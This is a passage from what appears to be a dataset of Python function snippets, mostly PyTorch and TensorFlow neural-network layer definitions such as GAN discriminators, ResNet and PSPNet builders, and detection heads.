norm_layer=nn.BatchNorm2d, no_antialias=True):\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n if(no_antialias):\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n else:\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=1, padding=padw), nn.LeakyReLU(0.2, True), Downsample(ndf)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n if(no_antialias):\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n else:\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n Downsample(ndf * nf_mult)]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)", "def build_resnet50(self):\n use_batch_norm = self.use_batch_norm\n\n imgs = tf.placeholder(tf.float32, [self.batch_size]+self.img_shape)\n is_train = tf.placeholder(tf.bool)\n\n conv1_feats = convolution(imgs, 7, 7, 64, 2, 2, 'conv1')\n conv1_feats = batch_norm(conv1_feats, 'bn_conv1', is_train, use_batch_norm)\n conv1_feats = nonlinear(conv1_feats, 'relu')\n pool1_feats = max_pool(conv1_feats, 3, 3, 2, 2, 'pool1')\n\n res2a_feats = self.basic_block(pool1_feats, 'res2a', 'bn2a', is_train, use_batch_norm, 64, 1)\n res2b_feats = self.basic_block2(res2a_feats, 'res2b', 'bn2b', is_train, use_batch_norm, 64)\n res2c_feats = self.basic_block2(res2b_feats, 'res2c', 'bn2c', is_train, use_batch_norm, 64)\n \n res3a_feats = self.basic_block(res2c_feats, 'res3a', 'bn3a', is_train, use_batch_norm, 128)\n res3b_feats = self.basic_block2(res3a_feats, 'res3b', 'bn3b', is_train, use_batch_norm, 128)\n res3c_feats = self.basic_block2(res3b_feats, 'res3c', 'bn3c', is_train, use_batch_norm, 128)\n res3d_feats = self.basic_block2(res3c_feats, 'res3d', 'bn3d', is_train, use_batch_norm, 128)\n\n res4a_feats = self.basic_block(res3d_feats, 'res4a', 'bn4a', is_train, use_batch_norm, 256)\n res4b_feats = self.basic_block2(res4a_feats, 'res4b', 'bn4b', is_train, use_batch_norm, 256)\n res4c_feats = self.basic_block2(res4b_feats, 'res4c', 'bn4c', is_train, use_batch_norm, 256)\n res4d_feats = self.basic_block2(res4c_feats, 'res4d', 'bn4d', is_train, use_batch_norm, 256)\n res4e_feats = self.basic_block2(res4d_feats, 'res4e', 'bn4e', is_train, use_batch_norm, 256)\n res4f_feats = self.basic_block2(res4e_feats, 'res4f', 'bn4f', is_train, use_batch_norm, 256)\n\n res5a_feats = self.basic_block(res4f_feats, 'res5a', 'bn5a', is_train, use_batch_norm, 512)\n res5b_feats = self.basic_block2(res5a_feats, 'res5b', 'bn5b', is_train, use_batch_norm, 512)\n res5c_feats = self.basic_block2(res5b_feats, 'res5c', 'bn5c', is_train, use_batch_norm, 512)\n\n res5c_feats_flat = tf.reshape(res5c_feats, [self.batch_size, 49, 2048])\n self.conv_feats = res5c_feats_flat\n self.conv_feat_shape = [49, 2048]\n self.num_ctx = 49 \n self.dim_ctx = 2048\n\n self.imgs = imgs\n self.is_train = is_train", "def __init__(self, n_channels_in: int = 3, n_channels_out: int = 3, n_hidden: int = 64,\n norm_layer: nn.Module = nn.BatchNorm2d, use_dropout: bool = True,\n n_hidden_layers: int = 3, padding_type: str = 'reflect', temperature: float = 1,\n device: str = \"cpu\", **kwargs):\n super(ToyCalNet, self).__init__(n_channels_in, n_channels_out, device, **kwargs)\n\n # save for use in forward pass\n self.temperature = temperature\n\n # If normalizing layer is instance normalization, add bias\n # use_bias = norm_layer == nn.InstanceNorm2d\n use_bias = True\n use_dropout = True\n\n\n # Initialize model input block\n layers = []\n\n # Add input block layers\n layers += [nn.ReflectionPad2d(1)]\n layers += [nn.Conv2d(n_channels_in, n_hidden, kernel_size=3, bias=use_bias)]\n\n # layers += [nn.Linear(n_channels_in, n_hidden)]\n\n layers += [nn.Dropout(int(use_dropout) * 0.2)]\n layers += [norm_layer(n_hidden)]\n layers += [nn.LeakyReLU(0.2, inplace=True)]\n\n # Add hidden block layers\n for i in range(n_hidden_layers):\n # Add input block layers\n layers += [nn.ReflectionPad2d(1)]\n layers += [nn.Conv2d(n_hidden, n_hidden, kernel_size=3, bias=use_bias)]\n\n # layers += [nn.Linear(n_hidden, n_hidden)]\n\n layers += [nn.Dropout(int(use_dropout) * 0.2)]\n layers += [norm_layer(n_hidden)]\n layers += [nn.LeakyReLU(0.2, inplace=True)]\n\n layers += [nn.ReflectionPad2d(1)]\n layers += [nn.Conv2d(n_hidden, n_channels_out, kernel_size=3)]\n\n # layers += [nn.Linear(n_hidden, n_channels_out)]\n\n layers += [nn.Dropout(int(use_dropout) * 0.2)]\n # layers += [nn.Softmax(dim=1)]\n\n # Save model\n self.model = nn.Sequential(*layers)", "def forward(self, feats_S, feats_T):\n losses = 0.\n for s, t in zip(feats_S, feats_T): # B,C,1/16\n t = t.detach() # context path feature\n B, C, H, W = t.shape\n # patch_h, patch_w = H // 2, W // 2 # max_pool 到 2x2 计算\n patch_h, patch_w = H // 4, W // 4 # 控制输出 feature map 的大小\n # todo: 可以考虑调小 pool size\n maxpool = nn.MaxPool2d(kernel_size=(patch_w, patch_h), stride=(patch_w, patch_h),\n padding=0, ceil_mode=True)\n loss = self.criterion(maxpool(s), maxpool(t)) # 2x2\n losses += loss\n return losses", "def _init_layers(self) -> None:\n self.relu = nn.ReLU(inplace=True)\n self.cls_convs = nn.ModuleList()\n self.reg_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n self.cls_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.reg_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n pred_pad_size = self.pred_kernel_size // 2\n self.atss_cls = nn.Conv2d(\n self.feat_channels,\n self.num_anchors * self.cls_out_channels,\n self.pred_kernel_size,\n padding=pred_pad_size)\n self.atss_reg = nn.Conv2d(\n self.feat_channels,\n self.num_base_priors * 4,\n self.pred_kernel_size,\n padding=pred_pad_size)\n self.atss_centerness = nn.Conv2d(\n self.feat_channels,\n self.num_base_priors * 1,\n self.pred_kernel_size,\n padding=pred_pad_size)\n self.scales = nn.ModuleList(\n [Scale(1.0) for _ in self.prior_generator.strides])", "def cnn_model_fn(features):\n print(\"features shape\", features.shape)\n\n input_layer = tf.reshape(features, [-1, 28, 28, 1])\n\n conv1 = tf.layers.conv2d(inputs=input_layer, filters=64, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv1)\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2, padding=\"same\")\n print(pool1)\n conv2 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv2)\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2, padding=\"same\")\n print(pool2)\n conv3 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv3)\n conv4 = tf.layers.conv2d(inputs=conv3, filters=256, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv4)\n pool3 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2, padding=\"same\")\n print(pool3)\n pool3_flat = tf.reshape(pool3, [-1, 4 * 4 * 256])\n print(pool3_flat)\n fc1 = tf.layers.dense(inputs=pool3_flat, units=1024, activation=tf.nn.relu)\n print(fc1)\n fc2 = tf.layers.dense(inputs=fc1, units=1024, activation=tf.nn.relu)\n print(fc2)\n fc2_bn = tf.nn.batch_normalization(x=fc2, mean=0, variance=1, scale=1, offset=0, variance_epsilon=1e-6)\n print(fc2_bn)\n fc3 = tf.layers.dense(inputs=fc2_bn, units=10)\n print(fc3)\n return fc3", "def __init__(self, **kwargs):\n super().__init__()\n self.model_conv = models.resnet50(pretrained=True)\n for param in self.model_conv.parameters():\n param.requires_grad = False\n num_ftrs = self.model_conv.fc.in_features\n num_classes = 10\n self.model_conv.fc = nn.Linear(num_ftrs, num_classes)", "def __init__(self, input_size, nb_action):\r\n super(Network, self).__init__()\r\n self.input_size = input_size\r\n self.nb_action = nb_action\r\n \r\n #Connection with input layer and hidden layer\r\n self.fc1 = nn.Linear(input_size, 30)\r\n #Connection with hidden layer and output layer\r\n self.fc2 = nn.Linear(30, nb_action)", "def __init__(self, classes=2622):\n super().__init__()\n self.conv1 = _ConvBlock(3, 64, 64)\n self.conv2 = _ConvBlock(64, 128, 128)\n self.conv3 = _ConvBlock(128, 256, 256, 256)\n self.conv4 = _ConvBlock(256, 512, 512, 512)\n self.conv5 = _ConvBlock(512, 512, 512, 512)\n self.dropout = torch.nn.Dropout(0.5)\n self.fc1 = torch.nn.Linear(7 * 7 * 512, 4096)\n self.fc2 = torch.nn.Linear(4096, 4096)\n self.fc3 = torch.nn.Linear(4096, classes)", "def __init__(self):\n super(Match3DNet, self).__init__()\n self.features = nn.Sequential(\n # conv1\n nn.Conv3d(1, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv2\n nn.Conv3d(64, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # maxpool\n nn.MaxPool3d(kernel_size=2, stride=2),\n # conv3\n nn.Conv3d(64, 128, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv4\n nn.Conv3d(128, 128, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv5\n nn.Conv3d(128, 256, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv6\n nn.Conv3d(256, 256, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv7\n nn.Conv3d(256, 512, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv8\n nn.Conv3d(512, 512, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n )", "def Classify(x, reuse=False, keepProb=1.0,isNankai=False):\n with tf.variable_scope('Classify') as scope: \n if reuse:\n scope.reuse_variables()\n \n # 1st layer\n w1 = weight_variable('w1',[dInput,nHidden])\n bias1 = bias_variable('bias1',[nHidden])\n h1 = fc_relu(x,w1,bias1,keepProb)\n \n # 2nd layer\n w2 = weight_variable('w2',[nHidden,nHidden2])\n bias2 = bias_variable('bias2',[nHidden2])\n h2 = fc_relu(h1,w2,bias2,keepProb) \n \n # 3nd layer\n w3 = weight_variable('w3',[nHidden2,nHidden3])\n bias3 = bias_variable('bias3',[nHidden3])\n h3 = fc_relu(h2,w3,bias3,keepProb) \n\n \n # Toy\n if dataMode == 0:\n # 3rd layar\n w3 = weight_variable('w3',[nHidden2,nClass])\n bias3 = bias_variable('bias3',[nClass])\n y = fc(h2,w3,bias3,keepProb)\n # Nankai\n else:\n # 4th layer\n w4_1 = weight_variable('w4_1',[nHidden3,nClass])\n bias4_1 = bias_variable('bias4_1',[nClass])\n \n w4_2 = weight_variable('w4_2',[nHidden3,nClass])\n bias4_2 = bias_variable('bias4_2',[nClass])\n \n w4_3 = weight_variable('w4_3',[nHidden3,nClass])\n bias4_3 = bias_variable('bias4_3',[nClass])\n \n y1 = fc(h3,w4_1,bias4_1,keepProb)\n y2 = fc(h3,w4_2,bias4_2,keepProb)\n y3 = fc(h3,w4_3,bias4_3,keepProb)\n # [number of data, number of class, cell(=3)]\n y = tf.concat((tf.expand_dims(y1,2),tf.expand_dims(y2,2),tf.expand_dims(y3,2)),2)\n \n # shape=[None,number of class]\n return y", "def make_model(self, inputs, is_training):\n with tf.variable_scope('ResNet50'):\n x = conv2d(inputs, 64, [7, 7], strides=[1, 2, 2, 1], name='conv1') # size 1/2\n x = bn(x, is_training)\n x = relu(x)\n x = max_pool(x, ksize=[1, 3, 3, 1], name='pool1') # size 1/4\n\n x = self.conv_block(x, [64, 64, 256], '2_1', is_training, s=1)\n x = self.identity_block(x, [64, 64, 256], '2_2', is_training)\n x = self.identity_block(x, [64, 64, 256], '2_3', is_training)\n\n x = self.conv_block(x, [128, 128, 512], '3_1', is_training)\n x = self.identity_block(x, [128, 128, 512], '3_2', is_training)\n x = self.identity_block(x, [128, 128, 512], '3_3', is_training)\n\n x = self.atrous_conv_block(x, [256, 256, 1024], '4_1', 2, is_training, s=1)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_2', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_3', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_4', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_5', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_6', 2, is_training)\n\n x = self.atrous_conv_block(x, [512, 512, 2048], '5_1', 4, is_training, s=1)\n x = self.atrous_identity_block(x, [512, 512, 2048], '5_2', 4, is_training)\n x = self.atrous_identity_block(x, [512, 512, 2048], '5_3', 4, is_training)\n\n\n\n \"\"\"\n Astrous Pyrimid Pooling. Decoder\n \"\"\"\n with tf.variable_scope('ASPP'):\n feature_map_shape = x.get_shape().as_list()\n\n # global average pooling\n # feature 맵의 height, width를 평균을 낸다.\n feature_map = tf.reduce_mean(x, [1, 2], keepdims=True)\n\n feature_map = conv2d(feature_map, 256, [1, 1], name='gap_feature_map')\n feature_map = tf.image.resize_bilinear(feature_map, [feature_map_shape[1], feature_map_shape[2]])\n\n rate1 = conv2d(x, 256, [1, 1], name='rate1')\n rate6 = atrous_conv2d(x, 256, [3, 3], rate=6, name='rate6')\n rate12 = atrous_conv2d(x, 256, [3, 3], rate=12, name='rate12')\n rate18 = atrous_conv2d(x, 256, [3, 3], rate=18, name='rate18')\n\n concated = tf.concat([feature_map, rate1, rate6, rate12, rate18], axis=3)\n\n net = conv2d(concated, 256, [1, 1], name='net')\n\n logits = conv2d(net, self.N_CLASS, [1, 1], name='logits')\n logits = tf.image.resize_bilinear(logits, size=[self.RESIZE, self.RESIZE], name='out')\n\n pred = tf.argmax(logits, axis=3)\n pred = tf.expand_dims(pred, dim=3)\n\n return logits, pred", "def __init__(self):\n super(Generator, self).__init__()\n\n # output feature map will have the size of 8x8\n self.first_deconv = TransitionUp(in_channels=3, out_channels=256, stride=2, padding=1, kernel_size=4)\n self.first_batch_norm = nn.BatchNorm2d(256)\n\n # output feature map will have the size of 16x16\n self.second_deconv = TransitionUp(in_channels=256, out_channels=128, stride=2, padding=1, kernel_size=4)\n self.second_batch_norm = nn.BatchNorm2d(128)\n\n # output feature map will have the size of 32x32\n self.third_deconv = TransitionUp(in_channels=128, out_channels=32, stride=2, padding=1, kernel_size=4)\n self.third_batch_norm = nn.BatchNorm2d(32)\n\n # output feature map will have the size of 64x64\n self.fourth_deconv = TransitionUp(in_channels=32, out_channels=16, stride=2, padding=1, kernel_size=4)\n self.fourth_batch_norm = nn.BatchNorm2d(16)\n\n # output feature map will have the size of 128x128\n self.fifth_deconv = TransitionUp(in_channels=16, out_channels=16, stride=1, padding=1, kernel_size=4)\n self.fifth_batch_norm = nn.BatchNorm2d(16)\n\n # output feature map will have the size of 128x128\n self.sixth_deconv = TransitionUp(in_channels=16, out_channels=16, stride=1, padding=1, kernel_size=4)\n self.sixth_batch_norm = nn.BatchNorm2d(16)\n\n # output feature map will have the size of 128x128\n self.seventh_deconv = TransitionUp(in_channels=16, out_channels=3, stride=1, padding=1, kernel_size=4)", "def __init__(self):\n super(SimpleNet, self).__init__()\n\n self.conv_layers = None\n self.fc_layers = None\n self.loss_criterion = None\n\n #######################################################################\n # Student code begins\n #######################################################################\n\n self.conv_layers = nn.Sequential(\n nn.Conv2d(1, 10, kernel_size=5, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(3),\n nn.Conv2d(10, 20, kernel_size=5, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(3)\n )\n\n conv_out = int(20*5*5)\n\n self.fc_layers = nn.Sequential(\n nn.Linear(conv_out, 100),\n nn.Linear(100, 15)\n )\n\n self.loss_criterion = nn.MSELoss(reduction='mean')\n\n #######################################################################\n # Student code ends\n #######################################################################", "def arch(self, nn) -> 'final node of the tensor flow graph (y_conv)':\n\n print(self)\n\n # first conv. layer \n # 5x5 filter, 1 input channel, 32 output channels\n W_conv1 = nn.weight_variable([5, 5, 1, 32])\n b_conv1 = nn.bias_variable([32])\n stride1 = 1\n h_conv1 = tf.nn.relu(nn.conv2d(nn.x_image, W_conv1, stride1) + b_conv1)\n \n # first pooling layer (2x2) \n h_pool1 = nn.max_pool_2x2(h_conv1)\n\n # second conv. layer \n # 5x5 filter, 32 input channel, 64 output channels\n W_conv2 = nn.weight_variable([5, 5, 32, 64])\n b_conv2 = nn.bias_variable([64])\n stride2 = 1\n h_conv2 = tf.nn.relu(nn.conv2d(h_pool1, W_conv2, stride2) + b_conv2)\n\n # second pooling layer (2x2) \n h_pool2 = nn.max_pool_2x2(h_conv2)\n\n # reshape (flatten) output\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n\n # first fully connected layer\n W_fc1 = nn.weight_variable([7 * 7 * 64, 1024])\n b_fc1 = nn.bias_variable([1024])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # dropout\n h_fc1_drop = tf.nn.dropout(h_fc1, nn.keep_prob)\n\n # second (final) fully connected layer (softmax)\n W_fc2 = nn.weight_variable([1024, 10])\n b_fc2 = nn.bias_variable([10])\n y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n return y_conv", "def _pspnet_builder(xs,\n name,\n cnn_fn,\n num_classes,\n is_training,\n use_global_status,\n reuse=False):\n # Ensure that the size of input data is valid (should be multiple of 6x8=48).\n h, w = xs[0].get_shape().as_list()[1:3] # NxHxWxC\n assert(h%48 == 0 and w%48 == 0 and h == w)\n\n # Build the base network.\n xs = cnn_fn(xs, name, is_training, use_global_status, reuse)\n\n with tf.variable_scope(name, reuse=reuse) as scope:\n # Build the PSP module\n pool_k = int(h/8) # the base network is stride 8 by default.\n\n # Build pooling layer results in 1x1 output.\n pool1s = avg_pools(xs,\n 'block5/pool1',\n pool_k,\n pool_k,\n 'VALID')\n pool1s = nn_mgpu.conv(pool1s,\n 'block5/pool1/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool1s = upsample_bilinears(pool1s, pool_k, pool_k)\n\n # Build pooling layer results in 2x2 output.\n pool2s = avg_pools(xs,\n 'block5/pool2',\n pool_k//2,\n pool_k//2,\n 'VALID')\n pool2s = nn_mgpu.conv(pool2s,\n 'block5/pool2/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool2s = upsample_bilinears(pool2s, pool_k, pool_k)\n\n # Build pooling layer results in 3x3 output.\n pool3s = avg_pools(xs,\n 'block5/pool3',\n pool_k//3,\n pool_k//3,\n 'VALID')\n pool3s = nn_mgpu.conv(pool3s,\n 'block5/pool3/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool3s = upsample_bilinears(pool3s, pool_k, pool_k)\n\n # Build pooling layer results in 6x6 output.\n pool6s = avg_pools(xs,\n 'block5/pool6',\n pool_k//6,\n pool_k//6,\n 'VALID')\n pool6s = nn_mgpu.conv(pool6s,\n 'block5/pool6/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool6s = upsample_bilinears(pool6s, pool_k, pool_k)\n\n # Fuse the pooled feature maps with its input, and generate\n # segmentation prediction.\n xs = nn_mgpu.concat(\n [pool1s, pool2s, pool3s, pool6s, xs],\n name='block5/concat',\n axis=3)\n xs = nn_mgpu.conv(xs,\n 'block5/conv2',\n 512,\n 3,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n xs = nn_mgpu.conv(xs,\n 'block5/fc1_voc12',\n num_classes,\n 1,\n 1,\n padding='SAME',\n biased=True,\n bn=False,\n relu=False,\n is_training=is_training)\n\n return xs", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def get_trans_net():\n return nn.Sequential(nn.Linear(2, 64), nn.LeakyReLU(), nn.Linear(64, 64), nn.LeakyReLU(), nn.Linear(64, 2))", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)\n self.sigmoid = nn.Sigmoid()", "def __init__(self, input_nc, opt_net,ndf=64, n_layers=DEFAULT_N_LAYERS, norm_layer=nn.BatchNorm2d):\n super(PatchGAN_Discriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n self.decomposed_input = bool(opt_net['decomposed_input'])\n self.pre_clipping = bool(opt_net['pre_clipping'])\n projected_component_sequences = []\n in_ch_addition = input_nc if self.decomposed_input else 0\n kw = 4\n padw = 1\n max_out_channels = 512\n sequences = [nn.Sequential(*[nn.Conv2d(input_nc+in_ch_addition, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)])]\n # if self.decomposed_input:\n # projected_component_sequences = [nn.Conv2d(input_nc, input_nc, kernel_size=kw, stride=2, padding=padw)]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n # nf_mult_prev = nf_mult\n # nf_mult = min(2 ** max(0,n-n_layers+self.DEFAULT_N_LAYERS), 8)\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw,\n stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n padding=padw, bias=use_bias), norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw,\n # stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n # padding=padw, bias=use_bias))\n\n # nf_mult_prev = nf_mult\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n_layers, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw, stride=1,\n padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=1,\n # padding=padw, bias=use_bias))\n sequences.append(nn.Sequential(*[\n nn.Conv2d(min(max_out_channels, ndf * nf_mult)+in_ch_addition, 1, kernel_size=kw, stride=1,\n padding=padw)])) # output 1 channel prediction map\n self.num_modules = len(sequences)\n if self.decomposed_input:\n for seq in sequences:\n conv_stride = [child.stride[0] for child in seq.children() if 'Conv2d' in str(child.__class__)]\n assert len(conv_stride)<=1,'More than one conv layer in seq?'\n if len(conv_stride)>0:\n projected_component_sequences.append(nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=conv_stride[0],\n padding=padw, bias=use_bias))\n self.model = nn.ModuleList(sequences+projected_component_sequences)", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)", "def _init_layers(self):\n self.relu = nn.ReLU(inplace=True)\n self.rpn_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n self.rpn_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.rpn_cls = nn.Conv2d(\n self.feat_channels, self.num_anchors * 1, 3, padding=1)\n self.rpn_reg = nn.Conv2d(\n self.feat_channels, self.num_anchors * 4 * (self.reg_max + 1), 3, padding=1)\n self.rpn_iou = nn.Conv2d(\n self.feat_channels, self.num_anchors * 1, 3, padding=1)\n self.scales = nn.ModuleList(\n [Scale(1.0) for _ in self.anchor_generator.strides])\n\n ##############V2################\n conf_vector = [nn.Conv2d(self.num_anchors * 4 * self.total_dim, self.num_anchors * self.reg_channels, 1)]\n conf_vector += [self.relu]\n conf_vector += [nn.Conv2d(self.num_anchors * self.reg_channels, self.num_anchors, 1), nn.Sigmoid()]\n\n self.reg_conf = nn.Sequential(*conf_vector)\n ##############V2################", "def create(self):\n # 1st Layer: Conv -> norm -> ReLu\n conv1 = self.conv(x=self.X, stride_y=1, stride_x=1, padding='SAME', name='conv1')\n norm1 = lrn(conv1, 2, 1e-04, 0.75, name='norm1')\n # Apply relu function\n relu1 = tf.nn.relu(norm1)\n\n # 2st Layer: Conv -> norm -> ReLu\n conv2 = self.conv(x=relu1, stride_y=1, stride_x=1, padding='SAME', name='conv2')\n norm2 = lrn(conv2, 2, 1e-04, 0.75, name='norm2')\n # Apply relu function\n relu2 = tf.nn.relu(norm2)\n\n pool2 = tf.nn.max_pool(relu2, ksize=[1, 3, 3, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # 3st Layer: Conv -> norm -> ReLu\n conv3 = self.conv(x=pool2, stride_y=1, stride_x=1, 